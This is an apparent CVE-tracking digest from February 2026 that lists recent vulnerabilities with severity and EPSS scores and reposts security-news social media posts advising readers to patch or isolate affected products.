## Updated at UTC 2026-02-18T03:27:37.246004

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2026-23599 7.8 0.00% 4 0 2026-02-18T00:16:18.833000 A local privilege-escalation vulnerability has been discovered in the HPE Aruba
CVE-2026-22048 7.1 0.00% 2 0 2026-02-18T00:16:18.700000 StorageGRID (formerly StorageGRID Webscale) versions prior to 11.9.0.12 and 12.0
CVE-2026-26119 8.8 0.00% 2 0 2026-02-17T23:16:22.880000 Improper authentication in Windows Admin Center allows an authorized attacker to
CVE-2026-1670 9.8 0.00% 6 0 2026-02-17T23:16:19.480000 The affected products are vulnerable to an unauthenticated API endpoint exposure
CVE-2025-13689 8.8 0.00% 2 0 2026-02-17T23:16:18.740000 IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute
CVE-2026-2627 7.8 0.00% 2 0 2026-02-17T22:18:45.457000 A security flaw has been discovered in Softland FBackup up to 9.9. This impacts
CVE-2025-70954 7.5 0.01% 2 0 2026-02-17T21:32:22 A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM)
CVE-2026-22208 9.7 0.00% 4 0 2026-02-17T21:32:21 OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 con
CVE-2025-67905 8.7 0.00% 2 0 2026-02-17T21:32:21 Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an ins
CVE-2026-23648 7.8 0.00% 2 0 2026-02-17T21:32:21 Glory RBG-100 recycler systems using the ISPK-08 software component contain mult
CVE-2026-23647 9.8 0.00% 2 0 2026-02-17T21:32:21 Glory RBG-100 recycler systems using the ISPK-08 software component contain hard
CVE-2026-0929 7.5 0.02% 2 0 2026-02-17T21:32:21 The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capa
CVE-2026-1358 9.8 0.13% 1 0 2026-02-17T21:32:21 Airleader Master versions 6.381 and prior allow for file uploads without restri
CVE-2026-0829 5.8 0.02% 1 0 2026-02-17T21:32:21 The Frontend File Manager Plugin WordPress plugin through 23.5 allows unauthenti
CVE-2026-23595 8.8 0.00% 2 0 2026-02-17T21:32:08 An authentication bypass in the application API allows an unauthorized administr
CVE-2026-22769 10.0 0.00% 4 0 2026-02-17T21:32:08 Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a
CVE-2026-2630 8.8 0.00% 4 0 2026-02-17T21:32:08 A Command Injection vulnerability exists where an authenticated, remote attacker
CVE-2026-2441 8.8 0.03% 6 1 2026-02-17T21:22:16.427000 Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote a
CVE-2025-13691 8.1 0.00% 2 0 2026-02-17T21:22:13.900000 IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive inform
CVE-2024-7694 7.2 1.36% 4 0 2026-02-17T21:22:13.697000 ThreatSonar Anti-Ransomware from TeamT5 does not properly validate the content o
CVE-2020-7796 9.8 90.60% 4 0 template 2026-02-17T21:22:12.967000 Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zi
CVE-2008-0015 8.8 87.52% 4 0 2026-02-17T21:16:49.580000 Stack-based buffer overflow in the CComVariant::ReadFromStream function in the A
CVE-2025-70956 7.5 0.02% 2 0 2026-02-17T18:34:01 A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM)
CVE-2025-65753 9.1 0.00% 2 1 2026-02-17T18:33:00 An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 a
CVE-2025-70397 8.8 0.00% 2 0 2026-02-17T18:33:00 jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/
CVE-2025-70830 10.0 0.00% 2 1 2026-02-17T18:33:00 A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template
CVE-2025-70828 8.8 0.00% 2 1 2026-02-17T18:32:57 An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via th
CVE-2025-70866 8.8 0.01% 2 0 2026-02-17T16:20:26.010000 LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated
CVE-2025-65717 9.1 0.02% 4 0 2026-02-17T15:32:42 An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to
CVE-2025-65716 8.8 0.02% 2 0 2026-02-17T15:32:42 An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allo
CVE-2025-15578 9.8 0.02% 2 0 2026-02-17T15:32:42 Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurel
CVE-2026-2447 8.8 0.02% 3 0 2026-02-17T15:32:41 Heap buffer overflow in libvpx. This vulnerability affects Firefox < 147.0.4, Fi
CVE-2026-2616 8.8 0.00% 2 0 2026-02-17T15:16:24.717000 A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted ele
CVE-2026-2474 7.5 0.03% 4 0 2026-02-17T15:16:23.760000 Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap b
CVE-2026-2439 9.8 0.02% 6 0 2026-02-17T15:16:23.420000 Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure
CVE-2025-69633 9.8 0.03% 2 0 2026-02-17T15:16:18.877000 A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreato
CVE-2026-1731 9.8 61.03% 1 3 template 2026-02-17T13:40:10.320000 BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote
CVE-2026-2247 None 0.14% 2 0 2026-02-17T12:31:18 SQL injection vulnerability (SQLi) in Clicldeu SaaS, specifically in the generat
CVE-2025-7631 8.6 0.03% 2 0 2026-02-17T12:31:13 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2026-25903 None 0.03% 2 0 2026-02-17T12:31:13 Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configur
CVE-2026-2592 7.7 0.07% 2 1 2026-02-17T05:16:17.430000 The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Impro
CVE-2026-26220 None 0.55% 1 0 2026-02-17T03:30:16 LightLLM version 1.1.0 and prior contain an unauthenticated remote code executio
CVE-2025-12062 8.8 0.06% 1 0 2026-02-17T00:30:19 The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory &
CVE-2026-2564 8.1 0.04% 1 1 2026-02-16T17:18:09.150000 A security flaw has been discovered in Intelbras VIP 3260 Z IA 2.840.00IB005.0.T
CVE-2026-1333 7.8 0.01% 1 0 2026-02-16T15:32:54 A Use of Uninitialized Variable vulnerability affecting the EPRT file reading pr
CVE-2026-1046 7.6 0.03% 1 0 2026-02-16T15:32:54 Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links
CVE-2026-1334 7.8 0.01% 1 0 2026-02-16T14:16:18.160000 An Out-Of-Bounds Read vulnerability affecting the EPRT file reading procedure in
CVE-2026-2451 None 0.05% 1 0 2026-02-16T12:32:02 Emails sent by pretix can utilize placeholders that will be filled with customer
CVE-2026-2452 None 0.05% 1 0 2026-02-16T12:32:01 Emails sent by pretix can utilize placeholders that will be filled with customer
CVE-2026-26369 9.8 0.04% 1 0 2026-02-15T18:30:25 eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerabi
CVE-2025-32062 8.8 0.02% 1 0 2026-02-15T11:15:54.307000 The specific flaw exists within the Bluetooth stack developed by Alps Alpine of
CVE-2026-1490 9.8 0.08% 3 1 2026-02-15T04:15:53.783000 The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vu
CVE-2024-43468 9.8 87.46% 2 3 2026-02-13T14:04:05.243000 Microsoft Configuration Manager Remote Code Execution Vulnerability
CVE-2026-2360 8.0 0.05% 2 0 2026-02-12T15:11:02.290000 PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superu
CVE-2026-21513 8.8 2.99% 1 0 2026-02-11T15:38:13.670000 Protection mechanism failure in MSHTML Framework allows an unauthorized attacker
CVE-2026-21510 8.8 4.65% 1 1 2026-02-10T21:31:29 Protection mechanism failure in Windows Shell allows an unauthorized attacker to
CVE-2026-22903 9.8 0.57% 1 0 2026-02-09T09:30:28 An unauthenticated remote attacker can send a crafted HTTP request containing an
CVE-2026-1868 10.0 0.03% 1 0 2026-02-09T09:30:28 GitLab has remediated a vulnerability in the Duo Workflow Service component of G
CVE-2025-64155 9.8 0.04% 2 4 2026-01-20T16:16:06.200000 An improper neutralization of special elements used in an os command ('os comman
CVE-2026-20965 7.6 0.03% 2 0 2026-01-13T18:31:18 Improper verification of cryptographic signature in Windows Admin Center allows
CVE-2025-59922 7.2 0.05% 2 0 2026-01-13T18:31:14 An improper neutralization of special elements used in an SQL command ('SQL Inje
CVE-2025-6264 5.5 0.06% 1 1 2025-10-23T01:00:00.913000 Velociraptor allows collection of VQL queries packaged into Artifacts from endpo
CVE-2026-02447 0 0.00% 1 0 N/A

CVE-2026-23599
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T00:16:18.833000

4 posts

A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking ClearPass OnGuard Software for Linux. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with root privileges.

offseq at 2026-02-18T01:30:30.132Z ##

🚨 CVE-2026-23599: HIGH severity local privilege escalation in HPE Aruba ClearPass Policy Manager (6.11.0 & 6.12.0, Linux). No patch yet — limit local access, enforce MFA, and monitor systems. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-18T00:16:41.000Z ##

🟠 CVE-2026-23599 - High (7.8)

A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking ClearPass OnGuard Software for Linux. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with ro...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-18T01:30:30.000Z ##

🚨 CVE-2026-23599: HIGH severity local privilege escalation in HPE Aruba ClearPass Policy Manager (6.11.0 & 6.12.0, Linux). No patch yet — limit local access, enforce MFA, and monitor systems. radar.offseq.com/threat/cve-20 #OffSeq #Infosec #Vulnerability #ArubaNetworks

##

thehackerwire@mastodon.social at 2026-02-18T00:16:41.000Z ##

🟠 CVE-2026-23599 - High (7.8)

A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking ClearPass OnGuard Software for Linux. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with ro...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22048
(7.1 HIGH)

EPSS: 0.00%

updated 2026-02-18T00:16:18.700000

2 posts

StorageGRID (formerly StorageGRID Webscale) versions prior to 11.9.0.12 and 12.0.0.4 with Single Sign-on enabled and configured to use Microsoft Entra ID (formerly Azure AD) as an IdP are susceptible to a Server-Side Request Forgery (SSRF) vulnerability. Successful exploit could allow an authenticated attacker with low privileges to delete configuration data or deny access to some resources.

offseq at 2026-02-18T03:00:30.837Z ##

⚠️ CVE-2026-22048: HIGH-severity SSRF in NETAPP StorageGRID (pre-11.9.0.12, 12.0.0.4) with SSO + Entra ID. Authenticated attackers can delete configs/deny access. Patch or disable SSO now. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-18T03:00:30.000Z ##

⚠️ CVE-2026-22048: HIGH-severity SSRF in NETAPP StorageGRID (pre-11.9.0.12, 12.0.0.4) with SSO + Entra ID. Authenticated attackers can delete configs/deny access. Patch or disable SSO now. radar.offseq.com/threat/cve-20 #OffSeq #NETAPP #SSRF #Vulnerability

##

CVE-2026-26119
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-17T23:16:22.880000

2 posts

Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

thehackerwire@mastodon.social at 2026-02-17T23:19:23.000Z ##

🟠 CVE-2026-26119 - High (8.8)

Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T23:19:23.000Z ##

🟠 CVE-2026-26119 - High (8.8)

Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1670
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-17T23:16:19.480000

6 posts

The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.

offseq at 2026-02-18T00:00:43.881Z ##

⚠️ CRITICAL: Honeywell I-HIB2PI-UL 2MP IP (6.1.22.1216) has CVE-2026-1670 (CWE-306) — missing auth on API enables remote attackers to change recovery emails and take over accounts. Patch or segment now! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-17T23:20:12.000Z ##

🔴 CVE-2026-1670 - Critical (9.8)

The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T23:19:24.000Z ##

🔴 CVE-2026-1670 - Critical (9.8)

The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-18T00:00:43.000Z ##

⚠️ CRITICAL: Honeywell I-HIB2PI-UL 2MP IP (6.1.22.1216) has CVE-2026-1670 (CWE-306) — missing auth on API enables remote attackers to change recovery emails and take over accounts. Patch or segment now! radar.offseq.com/threat/cve-20 #OffSeq #Honeywell #Vuln #OTSecurity

##

thehackerwire@mastodon.social at 2026-02-17T23:20:12.000Z ##

🔴 CVE-2026-1670 - Critical (9.8)

The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T23:19:24.000Z ##

🔴 CVE-2026-1670 - Critical (9.8)

The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-13689
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-17T23:16:18.740000

2 posts

IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.

thehackerwire@mastodon.social at 2026-02-17T23:19:33.000Z ##

🟠 CVE-2025-13689 - High (8.8)

IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T23:19:33.000Z ##

🟠 CVE-2025-13689 - High (8.8)

IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2627
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-17T22:18:45.457000

2 posts

A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\Program Files\Common Files\microsoft shared\ink\HID.dll of the component Backup/Restore. The manipulation results in link following. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The vendor was contacted early ab

thehackerwire@mastodon.social at 2026-02-17T22:19:48.000Z ##

🟠 CVE-2026-2627 - High (7.8)

A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\Program Files\Common Files\microsoft shared\ink\HID.dll of the component Backup/Restore. The manipulation results in link followi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T22:19:48.000Z ##

🟠 CVE-2026-2627 - High (7.8)

A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\Program Files\Common Files\microsoft shared\ink\HID.dll of the component Backup/Restore. The manipulation results in link followi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70954
(7.5 HIGH)

EPSS: 0.01%

updated 2026-02-17T21:32:22

2 posts

A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM) within the TON Blockchain before v2025.06. The issue is located in the execution logic of the INMSGPARAM instruction, where the program fails to validate if a specific pointer is null before accessing it. By sending a malicious transaction or smart contract, an attacker can trigger this null pointer dereference, causi

thehackerwire@mastodon.social at 2026-02-17T16:20:13.000Z ##

🟠 CVE-2025-70954 - High (7.5)

A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM) within the TON Blockchain before v2025.06. The issue is located in the execution logic of the INMSGPARAM instruction, where the program fails to validate if a specifi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:20:13.000Z ##

🟠 CVE-2025-70954 - High (7.5)

A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM) within the TON Blockchain before v2025.06. The issue is located in the execution logic of the INMSGPARAM instruction, where the program fails to validate if a specifi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22208
(9.7 CRITICAL)

EPSS: 0.00%

updated 2026-02-17T21:32:21

4 posts

OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capability restrictions, exposing standard libraries such as 'os' and 'io' to untrusted portrayal catalogues. An attacker can provide a malicious S-100 portray

thehackerwire@mastodon.social at 2026-02-17T20:25:14.000Z ##

🔴 CVE-2026-22208 - Critical (9.6)

OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capabi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq at 2026-02-17T16:00:13.808Z ##

🚨 CRITICAL: CVE-2026-22208 in OpenS100 (S-100 viewer) enables RCE via unsandboxed Lua. Attackers can embed malicious scripts in S-100 catalogues — risk of full system compromise. Block untrusted imports & monitor. Patch when released. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-17T20:25:14.000Z ##

🔴 CVE-2026-22208 - Critical (9.6)

OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capabi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-17T16:00:13.000Z ##

🚨 CRITICAL: CVE-2026-22208 in OpenS100 (S-100 viewer) enables RCE via unsandboxed Lua. Attackers can embed malicious scripts in S-100 catalogues — risk of full system compromise. Block untrusted imports & monitor. Patch when released. radar.offseq.com/threat/cve-20 #OffSeq #CVE202622208 #infosec

##

CVE-2025-67905
(8.7 HIGH)

EPSS: 0.00%

updated 2026-02-17T21:32:21

2 posts

Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a related issue to CVE-2023-28892. To exploit this, an attacker must create a file in a given folder path and intercept the application log file deletion flo

thehackerwire@mastodon.social at 2026-02-17T20:25:04.000Z ##

🟠 CVE-2025-67905 - High (8.7)

Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a re...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T20:25:04.000Z ##

🟠 CVE-2025-67905 - High (8.7)

Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a re...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23648
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-17T21:32:21

2 posts

Glory RBG-100 recycler systems using the ISPK-08 software component contain multiple system binaries with overly permissive file permissions. Several binaries executed by the root user are writable and executable by unprivileged local users. An attacker with local access can replace or modify these binaries to execute arbitrary commands with root privileges, enabling local privilege escalation.

thehackerwire@mastodon.social at 2026-02-17T20:23:51.000Z ##

🟠 CVE-2026-23648 - High (7.8)

Glory RBG-100 recycler systems using the ISPK-08 software component contain multiple system binaries with overly permissive file permissions. Several binaries executed by the root user are writable and executable by unprivileged local users. An at...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T20:23:51.000Z ##

🟠 CVE-2026-23648 - High (7.8)

Glory RBG-100 recycler systems using the ISPK-08 software component contain multiple system binaries with overly permissive file permissions. Several binaries executed by the root user are writable and executable by unprivileged local users. An at...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23647
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-17T21:32:21

2 posts

Glory RBG-100 recycler systems using the ISPK-08 software component contain hard-coded operating system credentials that allow remote authentication to the underlying Linux system. Multiple local user accounts, including accounts with administrative privileges, were found to have fixed, embedded passwords. An attacker with network access to exposed services such as SSH may authenticate using these

thehackerwire@mastodon.social at 2026-02-17T20:23:42.000Z ##

🔴 CVE-2026-23647 - Critical (9.8)

Glory RBG-100 recycler systems using the ISPK-08 software component contain hard-coded operating system credentials that allow remote authentication to the underlying Linux system. Multiple local user accounts, including accounts with administrati...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T20:23:42.000Z ##

🔴 CVE-2026-23647 - Critical (9.8)

Glory RBG-100 recycler systems using the ISPK-08 software component contain hard-coded operating system credentials that allow remote authentication to the underlying Linux system. Multiple local user accounts, including accounts with administrati...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0929
(7.5 HIGH)

EPSS: 0.02%

updated 2026-02-17T21:32:21

2 posts

The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capability checks, allowing subscribers and above to create forms on the site.

thehackerwire@mastodon.social at 2026-02-17T16:13:43.000Z ##

🟠 CVE-2026-0929 - High (7.5)

The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capability checks, allowing subscribers and above to create forms on the site.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:13:43.000Z ##

🟠 CVE-2026-0929 - High (7.5)

The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capability checks, allowing subscribers and above to create forms on the site.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1358
(9.8 CRITICAL)

EPSS: 0.13%

updated 2026-02-17T21:32:21

1 posts

Airleader Master versions 6.381 and prior allow for file uploads without restriction to multiple webpages running maximum privileges. This could allow an unauthenticated user to potentially obtain remote code execution on the server.

beyondmachines1@infosec.exchange at 2026-02-17T09:01:23.000Z ##

Critical RCE Vulnerability in Airleader Master Industrial Monitoring Systems

Airleader GmbH patched a critical unauthenticated remote code execution vulnerability (CVE-2026-1358) in its Airleader Master platform that could allow attackers to upload arbitrary files and take control of the system.

**Make sure your Airleader Master is isolated from the internet and accessible only from trusted networks. Then plan a very quick update to version 6.386. If you have isolated the equipment you have a bit of breathing room, but don't forget to patch. Any isolation will be breached given enough time.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-0829
(5.8 MEDIUM)

EPSS: 0.02%

updated 2026-02-17T21:32:21

1 posts

The Frontend File Manager Plugin WordPress plugin through 23.5 allows unauthenticated users to send emails through the site without any security checks. This lets attackers use the WordPress site as an open relay for spam or phishing emails to anyone. Attackers can also guess file IDs to access and share uploaded files without permission, exposing sensitive information.

offseq@infosec.exchange at 2026-02-17T07:30:36.000Z ##

🔒 CVE-2026-0829 (HIGH): Frontend File Manager plugin ≤23.5 for WordPress has missing authorization, letting unauthenticated users send site emails & access files. Remove or restrict plugin use until patched! radar.offseq.com/threat/cve-20 #OffSeq #WordPress #Vuln #BlueTeam

##

CVE-2026-23595
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-17T21:32:08

2 posts

An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to gain administrative access, modify system configurations, and access or manipulate sensitive data.

thehackerwire@mastodon.social at 2026-02-17T22:00:07.000Z ##

🟠 CVE-2026-23595 - High (8.8)

An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T22:00:07.000Z ##

🟠 CVE-2026-23595 - High (8.8)

An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22769
(10.0 CRITICAL)

EPSS: 0.00%

updated 2026-02-17T21:32:08

4 posts

Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a hardcoded credential vulnerability. This is considered critical as an unauthenticated remote attacker with knowledge of the hardcoded credential could potentially exploit this vulnerability leading to unauthorized access to the underlying operating system and root-level persistence. Dell recommends that customers upgr

thehackerwire@mastodon.social at 2026-02-17T20:23:32.000Z ##

🔴 CVE-2026-22769 - Critical (10)

Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a hardcoded credential vulnerability. This is considered critical as an unauthenticated remote attacker with knowledge of the hardcoded credential could potentially exp...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL at 2026-02-17T19:44:30.485Z ##

New.

Mandiant:From BRICKSTORM to GRIMBOLT: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day cloud.google.com/blog/topics/t

Dell posted an update on February 11:

Critical: CVE-2026-22769: Security Update for RecoverPoint for Virtual Machines Hardcoded Credential Vulnerability dell.com/support/kbdoc/en-us/0

@neurovagrant

##

thehackerwire@mastodon.social at 2026-02-17T20:23:32.000Z ##

🔴 CVE-2026-22769 - Critical (10)

Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a hardcoded credential vulnerability. This is considered critical as an unauthenticated remote attacker with knowledge of the hardcoded credential could potentially exp...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-02-17T19:44:30.000Z ##

New.

Mandiant:From BRICKSTORM to GRIMBOLT: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day cloud.google.com/blog/topics/t

Dell posted an update on February 11:

Critical: CVE-2026-22769: Security Update for RecoverPoint for Virtual Machines Hardcoded Credential Vulnerability dell.com/support/kbdoc/en-us/0 #infosec #Google #Dell #zeroday

@neurovagrant

##

CVE-2026-2630
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-17T21:32:08

4 posts

A Command Injection vulnerability exists where an authenticated, remote attacker could execute arbitrary code on the underlying server where Tenable Security Center is hosted.

thehackerwire@mastodon.social at 2026-02-17T19:47:36.000Z ##

🔴 CVE-2026-2630 - Critical (9.9)

A Command Injection vulnerability exists where an authenticated, remote attacker could execute arbitrary code on the underlying server where Tenable Security Center is hosted.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq at 2026-02-17T19:00:13.622Z ##

🚨 CVE-2026-2630: CRITICAL OS Command Injection in Tenable Security Center (CVSS 9.9). Authenticated attackers can run arbitrary code on the server. Restrict access, monitor logs, and patch ASAP. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-17T19:47:36.000Z ##

🔴 CVE-2026-2630 - Critical (9.9)

A Command Injection vulnerability exists where an authenticated, remote attacker could execute arbitrary code on the underlying server where Tenable Security Center is hosted.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-17T19:00:13.000Z ##

